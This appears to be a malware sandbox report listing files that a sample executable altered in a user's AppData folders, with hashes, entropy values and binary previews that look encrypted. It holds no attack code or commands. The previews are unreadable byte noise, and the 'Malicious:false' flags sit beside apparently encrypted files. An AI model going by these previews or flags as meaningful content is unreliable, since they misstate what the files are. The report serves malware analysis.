                                                                                                                                      SHA-512:D90A20E780CE48D39F194BB7BA0E64D6F608EEB41A7575E25EB89C7BE5BB9F3383EA0F9DD08277F28CF345A6A43E12D87F99F63307B35BB4F9E46D312829D86C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"Maj.w...LK$... .....:....q.B..l.{....a.:UA}....../..#..c....6R....yu.B>.6k@.5...3....].h....X....4.j'.Ze<....ds.k....X.a..t:.B.4l....I......^.2..Sq1R....._..v\.....k..l..{.uk.Z..H.t.5...y(..r..GG...W"..\.K.7FX..9.8.l..t'd....i.+..&%...CK..%W.ti._i=~=T..U..>...#.o..1.=F..R..87.q^%.J...........)..q.uZ.$..uf.*.k?..H7.u.Ey"..F.k....eU.[c.G.Z..W....z74.Jl.9-...8.~..z"...)x.s........._.ZE...._.??X.#N....q....6.....&.I..R..M.......`...n.....y....sI....&..,.*..W.......|.9...7.......T_.x.@.%@Zs...?G.w$..(..\.....pI..~...F!.m.64....W.....d..W.=!....`..c..............F}^.j....^....=YT.I..6.g..M.~....g.~-.O?.<C....b.iU<.lF....y...a..O.:\pO.w.G.!...Sto...._....29.5...7.!N0<...........8..u".P..:..0lI2.-H....B...k...VY..)...2fW.=...,.......u>..n.A.B...z..!.#4..Y.......4D.L..zI5F.x.R6a*.@...n..V.....\.V.q...Wo.._wJ{-.....S/..w:$..!...s.=C..={..)6.....\.5...=.(..s"s..EFD;$..G.4.B..|...%..........D...S\ql.t....kz".F..^..d.....sa... ....>.@#.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview_4_35.ttf

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):759166
                                                                                                                                      Entropy (8bit):7.069469650948734
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:WXFwxFSOdXXHyheIQ47gEFGHtAgk3+/yLQ/zRm1kjFKy6NyjbqqZyU1ovpPqxXEl:4OvDd6Xg+1kYvN926
                                                                                                                                      MD5:7A1FEB569F7838D5ABC047009BB196CA
                                                                                                                                      SHA1:F32D1A00C14D83785FA80650063D0FC9EFA83004
                                                                                                                                      SHA-256:36F057E649F25B2EE7C0645B7B2F1CB90969BC7B91174A1E5A2CE629B258123E
                                                                                                                                      SHA-512:0C50BEBFC365E0C36F5AE00761C13B7A8A57E879A990D9F205519C4DCC2C8F80A178E20263A497C5CE50D4088193115182F0A5AA62C60DC0DF61139049F1222F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.....VJ.....`.k.?T r.V....X...T.U..=g.*...=...'...!.@z........Qc....Mco....LJ.tc}|.w.s.t.......`eU..W...`...../@..Ls.."....Y."..J..1.... E.-`........>....j...._...]L.........q..R..<x.l.d.M6....E;..X.i.D.)1..Y.......q..X..../n.3/...g..]....^4fkC....v.r.,./...rSh..r.....}...^.,T.......)9ZuN.s?02..B..tv..%..[.e.FnK^V....2A/..m..O lH....5.....HL...v.....T.\b%. ..,|#...6)+S.7c.,.Y...6%......DrsB..D(...\G.........$.R..^.../$.t./..Pd......^q...`.#...Z>...B...#...,.-.@.XW'....Ts..`h.l-..2U..".........S.E.1J....mz....L...$.9.T.GC\-..B..{xuz..`.4.."h&^9.B_.....g.y`...T7..1..;.{Q...kY.m#0....TG.^Q..> C.2.o.M..."CT..j...?..X,.K.J.A...m.T.&...X....K....<..4c%.....?X..c-....R&.%...9~.G..!.g.(......^...n...U....6op>2..#q+.+..5.1.Bj.5..`..fk}.. .M.A......kErx.....3d..:*..v..Y..*...D.z....o_@:RA8<.......pl.."..[_..?\.h.....t.......!.t.$...).f.F...,_..Z~.X..SdQ.1.g...^@U..l.we."..r@.Ll....Z..O..hyA....&.[.u. .....f..X...sco...v^Qh.bn....p.Ki...2.5IB........

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\GameDVR\KnownGameList.bin

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):582670
                                                                                                                                      Entropy (8bit):5.269063237562667
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:2nVQhLN1buXrDY3jJ5/H/KT8pNbGNPLRdMlduU6/24J2:2nihB1rzrH/KAutubcJ2
                                                                                                                                      MD5:10BE330B4016700FC168D14914A1D78C
                                                                                                                                      SHA1:F80C3017833EC8EE8C24F619B31DBC65F73EA08F
                                                                                                                                      SHA-256:170F6CB33C8F354C0AC1C211B34D1B69CCD568995F04DE6F58DFBC481A57BD78
                                                                                                                                      SHA-512:9343BCF0608DC5E49CBAB624F60144BD5E2A6DCB1C87E804AC67D232678AABF076A9A4D98D97AD4C2EFF56350B7934CB257C1A3D808CE979A1345917CDF20F18
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..........n'..V....U...5...!G.&...T..^.....+.Qb..'.5..x.tQ.....e...*..\8.......i....&F>~.P...3..BG...~..%.2......O.....Gc*.D(.>....5..#.V..z......-....`!(.!?..q|......-..a.K{..!#.,.<....I...6.CTtU...+....[.4..P..>..*..+...|d.~3.....O..D..a..nx..!i:..,..6^.......W.....1,.}....a3.9K.L).P.X...f;..U.NZt.V?..:..1..G..$..syD.+._<.2'.w.P..EH.I}].C..b..)...cA..dw!.6*l.*..4b...4.....,.@.fa.......e].P...U#.@....G0.%...C."m...15.....1....|..].E..8...K.....+m....,.4....U.}}K..>].>e.C\.@......qW.<.;.I...4.6gp7[el...K..S.$.U@.+zH0.U...o...F.}c.r,.K..R.d.s.s.....o....`.Qrvb..-..p...8sj5..q{..%x.X.....pk....Q...&.....[..?).=.`.w...k+..a..I.G...+<..e.ueM...K.=......./9.G9.,P2......@v..s.nZR....D.,.j.]....w...j}A'.J.r.Txz..#.(..|...!..0o.......07..x.P.!...........j.../l.......`..Hb...5'.V9..aD.H]*b....:.zB..B..,....b..h........l...x......%...'.?.=......E..Y."1.$.......,.. .J....#|t.....Q.......bi..0....8..$:Kv...].2(...(9..b...1....C8>.[......*......N.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Internet Explorer\brndlog.txt

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6906
                                                                                                                                      Entropy (8bit):7.973387371410013
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:qPuCg3ZdDZhmB0VwaScxuP/p0YugCbGQ154:qPGdDG+ZSAAjGD4
                                                                                                                                      MD5:B46981C7B7C35CA83A6DAA9120B6D9C2
                                                                                                                                      SHA1:209329012910885B100EB52D1A6398F39B0F828E
                                                                                                                                      SHA-256:8250C2A8AC46711FAEE9474668CB8CCB714CDE89800041BBC7D7E04F9C8FFEAC
                                                                                                                                      SHA-512:7D6EA6106FC00DA44A2B7F1C89FC81E16EF6A0A0360B284021DD911F4B3AF184419B5C40373BA71D49B22B8BF8AF08ABB414D46BC7DC107440E2809333896A94
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:10/03.<.%"[4...j.&k&...d.UY.%T7....O...6.Y.....z ..`z.....i.p....X..{...`<..d.y.~.....'.F..D..aU.i.:. ..L..".A*i.E.....>.qV.:&V.1...p.E........0.)...A.0Z1.*.{"...,F.2r....bE..g.....S..S..Y...../.M......I.2y...Y.6...^o,MDV.I.qa.<9...&I..l....).\LH.Q....~..7M@.e..]kK.....?D..Yqp.'\}..c..]....d+.;o..M...tZ^=.[\.t.*6;3...aI.....!...N^.....s....A..^90T....J.......TB.....I......Z.\....^b..........\.i.?Z...6..%w....R...V.....t..E;...lj..Xyn>:.).p*.....Z.!:...OqGT.p./.5.^.I.Tz..q...."..U}..q....6Ro..s....U.|.Q...<E^....%.D{.cg[..#(kd...`..~6.........,(.J...a$w...P._.!.(?t.>)..uH........b.{R.....97.8Y>.r...6V.T...P...\.....v.!%.E.2.CQ,...{.z.......L..7zC-...9.i.B..x..j.....ga.../..'.D.O.Q .<F..o.j.^nz....%.C.!.....<./....-A..T.y.....v.Y.)8..f....5(m....m...,I..~.9.X"..;.....&.td.!.,aF........]]...1..fO..p....K.&v\..T).....o........`.........*fK...[.\!:."...k..=....5..uO+.-..eDpU.1S..R...{.4?.....O..[._..>...wD...Z......c...3.......9./...W..81..........

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (416), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):834
                                                                                                                                      Entropy (8bit):7.75687558736374
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:QG9fRE8an/RURkOr4ldJLjt2lMtwwLVSIZYYoUHfU9/fpfPxuLTE//Lm0Mn1noJt:Q0pzRkO81sYImU93LcTQxuBWPbD
                                                                                                                                      MD5:B2A02010210A146DE4F2552156535B53
                                                                                                                                      SHA1:2DEC3990E291F01C3EDAF295024C365C7EFECAB3
                                                                                                                                      SHA-256:AA3C9573E9331CE35263F1AF8E633CC3C7A0F2A9D91BA6B6E8E5D0F132A7CBB2
                                                                                                                                      SHA-512:6DD02BFB3018AE0725CDFE29CB9AF3A184A627F8771A9B08EE0587EE5782DEC472D101CA0877293DC245C3BED146E07F5517D60FB04BC94297EE7E81E94A088D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..1.06.U.A.L.. t.|.4P...R).V......0.2........6..+/.4%.c....S_K@j.T....dum.....~.h&.?.T...B..P~.b.J:...P........XzI..[A.?.X.C..X...Z......E .v^......j...u_....a.5/|.....FN..';....~.D..N.wS..3B.G7O...G..,X..0...;..ADL.M.YZ.:.....uZ..mL...I...._[v..MO5...2J....l...?..j..\.cEB#=f..i..N`&...Y...9.....z.@.Rg.......e..Zfh'.M.v.2..,..U....(..V..~y....P.'C"..%~...@....#=..-.A ....l.]..C...3..wO.P_.`f.,..kc..A..N...\..J..W....KPV.b...)....}..\.'?{.....'..r.+..J)[D..ahHu...y.I.....a.......q.F+!./a....`..,../......(+.....G.A.PC...&~.(..,.UFb......k..g\a..Ma.r...g....^.[.c.V..=g$x..."7....t.m.z..9...E.5..4.=.V...j.1......h..;t.. ...U\i...]..x0.X..2...3....c.N[.k.vz=S..,x=....@..?..y.D..?..D.E..k,....4f...'..Qm..o--#...5..<.U.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Internet Explorer\ie4uinit-UserConfig.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1740
                                                                                                                                      Entropy (8bit):7.902392333696196
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:m4wZZgM4jAwBbcdUhJesajFbhBf37PoshoD:m4wgFBIKhJez7Pl6
                                                                                                                                      MD5:AC61BB5F174974A12906CF314BBF04E5
                                                                                                                                      SHA1:2EB5583F5324240714B50FBAD986977028A45640
                                                                                                                                      SHA-256:1B7CFDB1CCACE0B1868A50E5C95931EA893538052A7E29908ABC2F3623E4D316
                                                                                                                                      SHA-512:5AB23625E19B1757AFFE39C56539681D8A0C89D460808CFDE6C369894C464CBC6A920288D5F02A1FCB3660068F5F27EBA2A2771D109EBD16167D7EC1F3052AC3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..1.0...e1...}*.;/..~j.>W"u.gVg..=.._.#..[n.@$...^N.d=....v..#.z1.K...g.Y...f.....8..m.+~...v....e...3K.].,.[.-.E....K.l.._..7.......,.X..f.x>....F...s..A.}.r...,.P6....>..G...<.....>..7..Oa:pS8...X....4...N......d.[."..Q,k...-(.mS....r..0.....|o.W..,...s#PCi~...F.@......d...3...I..$.G..cQ..j.%.AU...*.......57'.i!.>....9...E_.'M.!u....Q.?`.../z>3..VE...f..Z...;.....pU...7.;`....j9..I........82..K.fO..,......\.lN.............f,..j......Z......lU.%....79-.%..........._B......(.e.AU.`.PH]......DJ.D.$.#bTD..F.............B-O3l*.U...'.<...&...BJ.C..;...j...G.1.5.|.5Fb.g......A?.i.I..!.gz.Q..O...(....T..........|....&........Oa..S.%MCZ........+.TSq..H.f\.aPF.e.#...F1.0..h.}.mz..".......z.....p&.....{6s.R..*zB....(...<.....:d....E.'f.....dp.X.N..\....G...d..s..............".EA...4.N.V.`.f]...W....yj.....~.'.U)]....`.. ...1$R.X....*..fG.......{.....R...Y.....;.V.Yz....S..NzRh.<O...p..6~.I.S.yoi.p..`....Aal.......@._M\....P..,.C...h.b.A..$l#...+.I.t3f`z..y..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.CampaignStates.json

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1294
                                                                                                                                      Entropy (8bit):7.820053379021551
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:YwkNSlKDUk7YDczSkE0dBCCdEzGB9uqAttZY26yylVKpkRzgLqu879FK4bD:Yt6KDJYOSOdtjK7ZB6VVD9tsiD
                                                                                                                                      MD5:6985AE2C4C036B37B0D6FD02EC674D9E
                                                                                                                                      SHA1:9B879EDFA25C6D3BA4669EFBE22A040BFBFCE1BB
                                                                                                                                      SHA-256:01B8FED76101AF88F6EB062F7EC121B71A782C2A325601848451C2BBB50825D1
                                                                                                                                      SHA-512:D037D55B9ED3595E2ABE809A7E47E1D869A0039F1044BD44B2933FA4601A532D23C9C2E6556799BA850151DFE3B8A4D4A1B61ACD381AF6FF092FCC6DBFBFDBD7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"CamKyd..a..M.Yu...q..'...{...{....%..L.:....v/&.2...k.|z...Z..M..wD.w.PC..........{.K.P.w8..\..7..'..5*..ca{...I...Fh...K.....;.tM..........,rrF..+..L).6.F...)....e.D.%. .BI.Oj...J...-^.IJ.i....e..fo.d}....a.'..C..,..0...@:..}...M...?..91MA.^b+9{...)pB.F..5^.n.)Z.....G0k$".<.C....._{........"Z.....w..q.+lo....|.G!!..Dm.p.,.=@.gv..f.....I..u...%!.}v6...,.N.#r:...!..P#..Bt..... .K.......I...;...!.%V....r.QS7...d.-....w......F......:..m...>B/zB....?..6P...i6!.e...?d.-7.#o[.P.4..J..JR.....m.".P..^J...~...kxY.b.upE.w......B13!\.mb..P{ck..Y.V....c._...o...F.+.E.T.G-q...._.......&....3@.5....c...*Y.q'.N..sN3.t...g.;JM.oH.l.|..1Q+..f .....PW ..&L/k9V.....a..Y...[RB..!.>K=...vm....5G...Q;2........s..+@.....dYBu..#..0..>s...p.v.x...9.o./L..-....B..A..r.y..,..I........M..6.......i.U.]<....U.=.....9.>......v. Gx........9m.nO.x.j"}pJ4.s.....u......y:...Q!.3B...e..r..j.1Ff+...Qzk.M.a......Kn..d.."...+. ..R.!..3...M.^...f!.sdu..........1

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.GovernedChannelStates.json

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1074
                                                                                                                                      Entropy (8bit):7.805792816004222
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:YBPI1yU11owS4i59285xXwKRdyT044BTXcIA29kZfPTmrNYho6EvAPU17bD:Y9INTQc85RwKDyg1XcHGkTmaC6/P0D
                                                                                                                                      MD5:96207DD10F511ED28E95C788A216BE83
                                                                                                                                      SHA1:165DD6BB99CDDDBEA0AE586A64464BC076B2510A
                                                                                                                                      SHA-256:91FAFFAACE3A1CAF4DEB9E550A7EFCDDF4B8316EBFE17907CEEDABD085B8FACF
                                                                                                                                      SHA-512:1F7665D9CEBC22BECA58F349D2A24D3176EA6518D07D5334F2CDE37263D31EFD4C629C960E606BC1603AEB7710A60CD5F9E560325612A9DA8E7AC26BAF02E47D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"Cha...7X..l.T1.%.P...>F....NZ.!.&.|j...4...7 .1g.Y.jn..58p.U.P.......T....9.5..wx.et.{......r.U..Bp...7xN.c9_....SO....U.W3...d..8..E...D...@-.vZ!.a3..P'......)s@............n*.-..).c..\.8..;x2Y:....=0.............w....b.6r..Mu...[@.7)(&.~../..xz..qtb......&9'....U....D.....a.jA...M.a.Rz=0.._.].J..|....G.S4.e-..4..e.e.v.....A#X....].Z.....oj..c.T..k.6.GOh7..q.9....a.4..._A..f......khxai.....)....x...\......I...Y}.L.....-..........{G.H..+...m..5...........{,c..8.2.m!Y[{S..8......:.}...o.......~.....;.x..H.8..)Adml..........cR.SKg...l.ow...4....%sE%.g.gv..k.,bd..J..NxX........_......e"a.$kt5.R..8J..6..U..Z.......'~...c..i..(%.o`S..^.hKVJ.V....,I..8.^...KO..`.K8..y._r.......b}o.bP.z.R.F.?.....i.)$R..50.91._r...4....X..\.....G,..P...4!'.I....(&_.D.,{B..I=.V.....MZ.V$.LoU=.... .6..-....s..F...k.Q..:2..Z~.r(N..2...m.;....""...."j:.?...C].I.%O.-B....I.g.>0........}<_..\.]3.....n.E.....H..y[....q.nf..F..=[.o...5.?..;.c..3..^....U..D...tp8q

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.Settings.json

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):421
                                                                                                                                      Entropy (8bit):7.450206843832017
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:Y2YjdLZQcDrNbIH0QE9Uoj7ch2hLvxVubFZz1wukIcii9a:YxjJPdbO//Och2hLx8L1zbD
                                                                                                                                      MD5:2C0E30750191A9FC44EF6672FE9A5F6E
                                                                                                                                      SHA1:1393C22AA9C3BA2C1532079224AA5995C861126F
                                                                                                                                      SHA-256:5241C729209E9E85633B10446D9A38A87928C02A40B4447E9F8F9644EFACF739
                                                                                                                                      SHA-512:D058C8755372B5437CF1F5B51D4EB637EB2A9D776C76D53F21E2164B2E0CB7F83164EA83680DDD9B1A8C6BE7FCFEB34B2DD428B35D277682242DE11CDE6387B2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"ShoF.>...R.-...n.....:.b..z..dW.q.V.P.G..d....8os,..l.k;..h...lK;...J.e..A:..8....=.s....H....Dm.bl...i]..Yt...u.W..G.......b...S..U...E@.d.%)..B....(.?.O..y.9.$.lo.>..2...&..D.N:..y.;=...V0.....9Q&. .....Q.6,#V]8i..@6...D....v._X.D...+.....UjS.^;W.m.I...x(..[.......^.R.q3.VD/.....F..$.....p....70...I.e.r,.>.|..p.]....^..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.SurveyEventActivityStats.json

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):348
                                                                                                                                      Entropy (8bit):7.21644773591723
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:Y2QNWGIMyR8wFhhIgCkz3Z78YYwBFdkzTWjDjU+Y0gHhm3Tc/2AF3ukIcii96Z:Y26BrCTzrh99V7uWT3Y0Q/2AdukIciik
                                                                                                                                      MD5:3BBCEB4F3033D17A575026663708F061
                                                                                                                                      SHA1:B9D2FDD15104795F187DDDE1C678CBCE7C639053
                                                                                                                                      SHA-256:DA3C589D8BB371542227B1C4CE9B4DCD6B608A0581A77F010311AA7442E27C93
                                                                                                                                      SHA-512:03DD99F6FB87488B010912DEC70385D6B21253A39BC328256FCA67173A8DF70DB75B7D0E0BEF4DF801A43D2CA85ECFE189DFCFB5E3C1B32F66A1CEB8C74E6738
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"SurQ..L.a......=K|.2F!..6....kt...L..~.`AoB.N.%~U....Ir/'3.......7I......n..F.$3m.......R.-m...@.:cG....q`cS....Q..b-...-...}b........A.....a*.Bo..k.@....L.......M..fQ.~".&I.......z,..2).p%..C.....fs......GC...?..%...|.v..w...h)....-..S......A.*>E....Y6.gP.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.SurveyHistoryStats.json

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):348
                                                                                                                                      Entropy (8bit):7.245109139512168
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:Y2QOffYGwosRQxi7yxWoQpeMDucCicN7hOG1Mk+JJjFmq6IgDS33ukIcii96Z:Y2Z3rw2xi2xhkeMDh9C7hOG1Mk+jBmrZ
                                                                                                                                      MD5:30EF2402F3864190E8FF4D5547130107
                                                                                                                                      SHA1:9E395EB10CEF1A5AD947179F1CDE8447148743AF
                                                                                                                                      SHA-256:8A1538D3BECDC8F42D63CC072860E74258F4AE7F36508179FA30D3BC41603EDD
                                                                                                                                      SHA-512:CF1CB7C825AD14E3ED73381D889F8BDD5DDF8815C5902A306389DCD25D1689653C58D56596043C991044CDA387434D41E7392608B2AAF5CAFC8AEE95F87FE61E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"Sur...t.......i.+.z....H....s.e.....^..[OW.........:.L.....G0.O.W.. ..q.{?.v....,..w..~.t..U-E...SM'..b6..J.E.T......x{.r.....E.sf.T..!..B.(K.n..Y...`..,.*..x...o_k.....0.n...@...b|...9.....&&S...0.....`..B.4i=.i.R..b..D.?}.0sM...z\...-H.Ym.EAq.Q(<.p/.ov.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule120100v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1333
                                                                                                                                      Entropy (8bit):7.8495424080121285
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:QaBYrMKc1jofhWOJjUVc8ofXrEbvshyfHbhQFr2vNRl6pVeW+IrXNbD:QaG5fhBJ4jofrEbE4/biwvnlQVenaXtD
                                                                                                                                      MD5:0C1CBBADA03B9FC828A0E31B08A23F30
                                                                                                                                      SHA1:7B6F295196F09AF135E04214D1D0A70B3DB420FE
                                                                                                                                      SHA-256:C4BDDFA041704229ABE7B7049F3A7D28933D3DFEAB5F07FB150FAFFEEE708B40
                                                                                                                                      SHA-512:C566DA6E00DF9E6038DB41A99A5640BC2375C52A64DF351B5990284DD18AEF19147F0C5F91DA02018BD068B81AE0AB34F54BCDC7D1F171A287E555920F615D24
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml-.#.3_.O0%.[......C.H.#P.....G...tSN%.....0....<........+r<......e. v...*.....j9......\.]........XgD..LU.'.j.u.JX\.T..ZBny.}n_....R.`+.lX....H_.e....Z....B4..&Hk.O.,..4.P..q.......D...HA.4...o./...*..Jo<.9.H...o..o.....l...?.1-w..S....h.7.........S.o...b.....o....*.SwB1...c/..?.fm..E.y.6.V.....R.....T[}l...~.]...T(E...g.eC...8..T.C.n....S{......W..{4...N.x'Q>...;Y.=..4...Bt.t...#%.)p....dfC......>.\..d.yw..U.,R-.,......L..$B...W...q7)...,[....8F...bd. .*.x...FN..xi..L.....nsa.O.,..q|.Dv.d..\.:<.........e.?zV...C...-....}...%u9..r3k(.@.3CX....=.WLr..UX.8.....h.(..v..m..LJ!..(3 . .......iq=.[...>Q.>..b.`..@..].....5o2.T..Y.....<uP.9...N.C0.6W(A...a.......b-..&.i..... y..%...*n.&..C..GB.... RO.?x../*....fD..(.v.#..Do+B.........X....|.-;.....LJ/6'.u..=.ez..A-.......!......&V..z....q?.kL.....^i+.}..;w&...b.9.....-.U..N....#.$.".....PC............\.&Y.Y*.7x*......4.h...y........)..6Z>.>...F..$1i......C[$^...NR..hM.<..j.h}............d...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule120119v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1664
                                                                                                                                      Entropy (8bit):7.878864364050166
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:t2vto1wqmAe4kOkduwQsqtEi2Tlaci5wQkqzELW+CxGD:svto1E4kduw45glab5hjz+x
                                                                                                                                      MD5:806DF4C43D929B2A07D817D6BB5A72B3
                                                                                                                                      SHA1:E87DA50B6D2AF14A486596A5B1DAEC3921EDCC66
                                                                                                                                      SHA-256:E69D9D5228EF649A4F8E0B9665FEAF41F0414BEEC61BDFDE1BEF1C060ABC5C52
                                                                                                                                      SHA-512:29F9A1E03B8C115AEA3C0201A81A7B05B7A41028090F5085722F2658D21A710DEBCC0689339158DA70F98268355E4B24584584B37E2C0B4AA4BBEB0AFC2F3E09
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...M4.0....0.4.).lK..A)g....\.Y.pf....+.8P]3..{9.....[...>.k"..V..........W=64s.~..V.}4.@..S.g.T8.[G.k....r..O[.H..%K..d..e.HO.%%a.@.N.C b).bR....?\Y.W..|8I2?..2/Z...U.<.....m.zuq".Q.).E..".6..........n#..j..b.eIIE.&E3.cV..QJ.fO.............h`Nwi.i.'3. e.....?.g....t....w..{s......Q....Ld..?4..>.xy.R.&..s..3.Ac-v.D....AHv_}$w..JM^.. .|.....+..G...nN.6.n!i...|..L..@..0 ..i.F......n..>.:...TG.H{...E..-.^..P.Y..P1..3*R./...+m..V.1.....B..i0.\.kQ......a.G.......]..N.o...;yU...._...`.]....^.....l..=..u.j..jw..-.....:.. ...|...+..j.R.-.s/H..kGv...(.o3#aD0..2.....cU<Jv...c~&N........q...H........w.X.".Qo..'d..p.%......t..b....:X..x.L....1. .%H..m...@V(. .=l....c...5....i2.........'.M....Gz.......G.m.......o..8... (.w.Z@u[..j"..?5.J..#..(...#.J...f....d>..=....Yw..O.i....<0.5.....1...I.i.8.e..l...h.#R.I_VsXJH.....a..j.Hab.8..e.E.......b+x+Jt..&{S..N..../1.XY.f....R..E..M.76|l..0..,D.2..J.vC....g..?....5{.3k,.}..d=....>.0*..X0......].?.$V%.&.A.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule120402v21.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4121
                                                                                                                                      Entropy (8bit):7.949912360442296
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:1RJPAGfQVhseqsq7+CMy/N44JI46ph9XeIV1Vdx3:7JP92hqKhWNN+D9Xn1fx3
                                                                                                                                      MD5:DD9462FE5462C3FABD812048F8FA8A20
                                                                                                                                      SHA1:77A2573FC76375B3A20ED8B71A43D12E72596941
                                                                                                                                      SHA-256:66C398FE2E74B214FE1F520C5D6C59A149B5C3FD21ACC83880089C2AF4B996DA
                                                                                                                                      SHA-512:ACAE92FABB89C74576BE9A6F0C6597CCF9A79FE27F1D9DD992968CB5356499E523E8721FE7F99281807412C82E0118641EAE305E0748C4AA49D2F8A605BFAB35
                                                                                                                                      Malicious:false
